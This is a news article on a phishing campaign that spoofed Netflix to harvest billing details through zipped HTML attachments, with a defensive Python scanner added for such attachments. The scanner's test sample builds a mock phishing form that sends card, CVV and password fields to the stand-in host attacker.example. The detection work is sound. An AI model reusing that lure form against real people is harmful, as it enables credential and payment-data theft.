Leveraging Netflix for credential harvesting.
N2K, Sep 21, 2022

INKY has discovered a threat actor targeting Netflix customers in a credential-harvesting campaign.

Leveraging Netflix for credential harvesting.

INKY this morning blogged about a phishing scheme that impersonates Netflix. Researchers report that between August 21 and August 27 of this year, Netflix customers were the target of a personally identifiable information (PII) harvesting campaign. The lure was a malicious HTML attachment compressed inside a zip file.

Social engineers show more linguistic savvy.

The campaign is noteworthy because it shows that criminal social engineering is being conducted with greater polish, without some of the clumsy diction and non-standard language that once made it easy to spot. As INKY puts it, "There was a time when brand fraud attempts were easier to catch because they contained many tell-tale signs of phishing. Multiple typos, strange word choices, suspicious URLs, and odd-looking logos provided insight to the recipients of these malicious emails. But times have changed. Cybercrime gets more sophisticated every year, with no signs of stopping. Today, many tell-tale signs of a brand impersonation are so cleverly hidden that even the most discerning eye can’t recognize them. That certainly is the case with the most recent Fresh Phish to swim into INKY’s nets."

Brand spoofing and a familiar attack sequence.

The phishing emails targeted Netflix customers and were spoofed to look as if they came from Netflix’s actual domain. They originated from a virtual private server in Germany and were then relayed through an abused mail server belonging to a Peruvian university, which allowed the messages to receive a DKIM pass and reach the recipient.

The scam itself had a familiar style. Recipients were told that they needed to update their Netflix billing information by downloading a form attached to the email. The attached “form” is a zip file containing an HTML page that opens on the recipient’s device and asks for PII. Once the recipient fills in their information, a button at the bottom reads “Agree and Continue.” And of course, when they agree and continue, their PII is sent to the threat actor.
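The attachment pattern described above (a zip wrapping an HTML page that carries a data-entry form) is something a mail gateway can check for before delivery. The scanner below is an added example, not code from INKY or the article: it opens zip attachments in memory, reports HTML members that contain a form, where that form submits, and whether it asks for billing or credential fields. The sample message, the sender address and the host attacker.example are constructed for the example.

```python
import io
import re
import zipfile
from email.message import EmailMessage
from urllib.parse import urlparse

# An HTML form that submits somewhere, and field names typical of a billing form.
FORM_ACTION = re.compile(r'<form[^>]*\baction\s*=\s*["\']?([^"\'\s>]+)', re.I)
PII_FIELDS = re.compile(r'\b(card|cvv|password|billing)\b', re.I)

def scan_zip_attachment(data: bytes) -> list[dict]:
    """Open the zip in memory; report HTML members that carry a submittable form."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".html", ".htm")):
                continue
            html = zf.read(info).decode("utf-8", errors="replace")
            actions = FORM_ACTION.findall(html)
            if actions:
                findings.append({
                    "member": info.filename,
                    "post_hosts": [urlparse(a).hostname for a in actions],
                    "asks_for_pii": bool(PII_FIELDS.search(html)),
                })
    return findings

def scan_message(msg: EmailMessage) -> list[dict]:
    """Walk the MIME attachments and scan every zip for embedded HTML forms."""
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if name.lower().endswith(".zip"):
            for hit in scan_zip_attachment(part.get_payload(decode=True)):
                results.append({"attachment": name, **hit})
    return results

def build_sample() -> EmailMessage:
    """Constructed lure shaped like the one described: a zip wrapping a billing form."""
    html = b"""<html><body><h1>Update your billing information</h1>
    <form method="post" action="https://attacker.example/collect">
    <input name="card"><input name="cvv"><input name="password">
    <button>Agree and Continue</button></form></body></html>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Netflix_Billing_Form.html", html)
    msg = EmailMessage()
    msg["From"] = "billing@netflix.example"  # constructed sender, not a real address
    msg.set_content("Please download and complete the attached form.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="Netflix_Billing_Form.zip")
    return msg
```

Calling scan_message(build_sample()) yields one finding naming the zip, the HTML member inside it, the external host the form posts to, and that billing fields are requested.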

Some email best practices.

INKY reminds users of best practices for handling unexpected emails. They advise being cautious of zip file attachments, since they cannot be previewed; visiting a company’s website directly to resolve an account issue rather than following a link or attachment; and checking the browser’s address bar (and hovering over links) to confirm that you are on a website rather than viewing a local file. They also note that SMTP servers should be configured not to accept mail from non-local IP addresses and relay it to non-local mailboxes, that is, not to act as an open relay.